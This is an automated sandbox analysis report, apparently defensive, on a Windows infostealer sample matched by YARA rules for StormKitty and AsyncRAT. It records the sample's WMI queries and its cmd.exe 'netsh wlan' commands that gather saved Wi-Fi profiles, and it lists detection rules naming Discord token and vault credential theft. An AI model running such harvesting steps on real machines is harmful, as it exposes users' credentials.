                              Source: 00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                              Source: 00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                              Source: 00000000.00000002.2566383997.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                              Source: Process Memory Space: cOH7jKmo25.exe PID: 7540, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                              Source: Process Memory Space: cOH7jKmo25.exe PID: 7540, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeCode function: 0_2_029763900_2_02976390
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeCode function: 0_2_02975AC00_2_02975AC0
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeCode function: 0_2_029797500_2_02979750
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeCode function: 0_2_029757780_2_02975778
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeCode function: 0_2_029797600_2_02979760
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeCode function: 0_2_059605F00_2_059605F0
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeCode function: 0_2_059606000_2_05960600
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeCode function: 0_2_0596C1080_2_0596C108
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeCode function: 0_2_0596C0F70_2_0596C0F7
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeCode function: 0_2_05965D520_2_05965D52
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeCode function: 0_2_05965D600_2_05965D60
                              Source: cOH7jKmo25.exe, 00000000.00000002.2565651220.0000000000F2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs cOH7jKmo25.exe
                              Source: cOH7jKmo25.exe, 00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameClient.exe. vs cOH7jKmo25.exe
                              Source: cOH7jKmo25.exeBinary or memory string: OriginalFilenameClient.exe. vs cOH7jKmo25.exe
                              Source: cOH7jKmo25.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: cOH7jKmo25.exe, type: SAMPLEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
                              Source: cOH7jKmo25.exe, type: SAMPLEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                              Source: cOH7jKmo25.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                              Source: cOH7jKmo25.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                              Source: cOH7jKmo25.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                              Source: cOH7jKmo25.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                              Source: cOH7jKmo25.exe, type: SAMPLEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                              Source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
                              Source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                              Source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                              Source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                              Source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                              Source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                              Source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                              Source: 00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                              Source: 00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                              Source: 00000000.00000002.2566383997.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                              Source: Process Memory Space: cOH7jKmo25.exe PID: 7540, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                              Source: Process Memory Space: cOH7jKmo25.exe PID: 7540, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/114@4/4
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeFile created: C:\Users\user\AppData\Local\e40d0e63b27ae1bdf03271cbddc24ff7Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeFile created: C:\Users\user\AppData\Local\Temp\tmpA6E7.tmpJump to behavior
                              Source: cOH7jKmo25.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: cOH7jKmo25.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeFile read: C:\Users\user\Pictures\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: tmpA77B.tmp.dat.0.dr, tmpA707.tmp.dat.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: cOH7jKmo25.exeReversingLabs: Detection: 91%
                              Source: cOH7jKmo25.exeVirustotal: Detection: 81%
                              Source: cOH7jKmo25.exeString found in binary or memory: \servers.dat-launcher_profiles.json/\launcher_profiles.json
                              Source: unknownProcess created: C:\Users\user\Desktop\cOH7jKmo25.exe "C:\Users\user\Desktop\cOH7jKmo25.exe"
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssidJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profileJump to behavior
